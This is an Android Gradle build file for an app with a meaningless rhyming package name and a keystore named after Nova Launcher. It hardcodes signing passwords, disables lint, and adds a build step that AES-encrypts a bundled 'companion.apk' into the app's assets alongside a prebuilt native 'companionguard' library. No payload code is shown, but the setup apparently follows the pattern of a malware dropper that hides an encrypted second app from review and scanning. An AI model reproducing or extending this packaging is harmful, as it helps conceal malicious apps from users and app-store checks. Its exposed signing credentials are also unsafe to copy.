plugins {
    id 'com.android.application'
    id 'org.jetbrains.kotlin.android'
}

android {
    namespace 'com.cristal.bristral.tristal.mistral'
    compileSdk 34

    defaultConfig {
        applicationId "com.cristal.bristral.tristral.mistral"
        minSdk 26
        targetSdk 34
        versionCode 1
        versionName "1.0"
    }

    signingConfigs {
        release {
            storeFile file("${project.rootDir}/nova-launcher-release.jks")
            storePassword "NovaLauncher@123"
            keyAlias "nova_key"
            keyPassword "NovaLauncher@123"
        }
    }

    buildTypes {
        release {
            minifyEnabled false
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
            signingConfig signingConfigs.release
        }
    }

    // libcompanionguard.so arrives pre-built from CI Stage 2 into jniLibs/
    // No externalNativeBuild needed — Gradle just packages the .so files directly
    packagingOptions {
        jniLibs {
            useLegacyPackaging false
        }
    }

    lintOptions {
        abortOnError false
        checkReleaseBuilds false
    }

    compileOptions {
        sourceCompatibility JavaVersion.VERSION_1_8
        targetCompatibility JavaVersion.VERSION_1_8
    }

    kotlinOptions {
        jvmTarget = '1.8'
    }

    sourceSets {
        main {
            java {
                srcDirs = [
                    'src/main/java',
                    'src/main/java/com/cristal/bristral/tristal/mistral',
                    'src/main/java/com/cristal/bristral/tristal/mistral/receiver',
                    'src/main/java/com/cristal/bristral/tristal/mistral/service',
                    'src/main/java/com/cristal/bristral/tristal/mistral/utils',
                    'src/main/java/com/cristal/bristral/tristal/mistral/adapter',
                    'src/main/java/com/cristal/bristral/tristal/mistral/model',
                ]
            }
        }
    }
}

// ── Encrypt companion.apk → assets/companion.enc at build time ────────────
task encryptCompanion(type: Exec) {
    description = 'Encrypt companion.apk → assets/companion.enc (AES-256-GCM)'
    group = 'build'

    def companionApk  = file("${projectDir}/src/main/assets/companion.apk")
    def assetsDir     = file("${projectDir}/src/main/assets")
    def encryptScript = file("${rootProject.projectDir}/tools/encrypt_companion.py")

    inputs.file companionApk
    outputs.file file("${assetsDir}/companion.enc")

    commandLine 'python3', encryptScript.absolutePath,
                companionApk.absolutePath,
                assetsDir.absolutePath

    doFirst {
        if (!companionApk.exists()) {
            throw new GradleException(
                "companion.apk not found at ${companionApk.absolutePath}."
            )
        }
    }

    doLast {
        println "[Gradle] companion.enc written to assets/"
    }
}

afterEvaluate {
    tasks.matching { it.name == 'mergeReleaseAssets' }.each {
        it.dependsOn encryptCompanion
    }
    tasks.matching { it.name == 'mergeDebugAssets' }.each {
        it.dependsOn encryptCompanion
    }
}

dependencies {
    implementation 'androidx.core:core-ktx:1.12.0'
    implementation 'androidx.appcompat:appcompat:1.6.1'
    implementation 'com.google.android.material:material:1.11.0'
    implementation 'androidx.constraintlayout:constraintlayout:2.1.4'
    implementation 'androidx.recyclerview:recyclerview:1.3.2'
    implementation 'androidx.cardview:cardview:1.0.0'
    implementation 'androidx.lifecycle:lifecycle-runtime-ktx:2.7.0'
    implementation 'androidx.lifecycle:lifecycle-viewmodel-ktx:2.7.0'
    implementation 'androidx.lifecycle:lifecycle-process:2.7.0'
    implementation 'androidx.activity:activity-ktx:1.8.2'
    implementation 'androidx.fragment:fragment-ktx:1.6.2'
    implementation 'androidx.startup:startup-runtime:1.1.1'
    implementation 'androidx.profileinstaller:profileinstaller:1.3.1'
    implementation 'androidx.viewpager2:viewpager2:1.0.0'
    implementation 'androidx.drawerlayout:drawerlayout:1.2.0'
    implementation 'androidx.coordinatorlayout:coordinatorlayout:1.2.0'
    implementation 'org.jetbrains.kotlinx:kotlinx-coroutines-android:1.7.3'
    implementation 'org.jetbrains.kotlinx:kotlinx-coroutines-core:1.7.3'
}
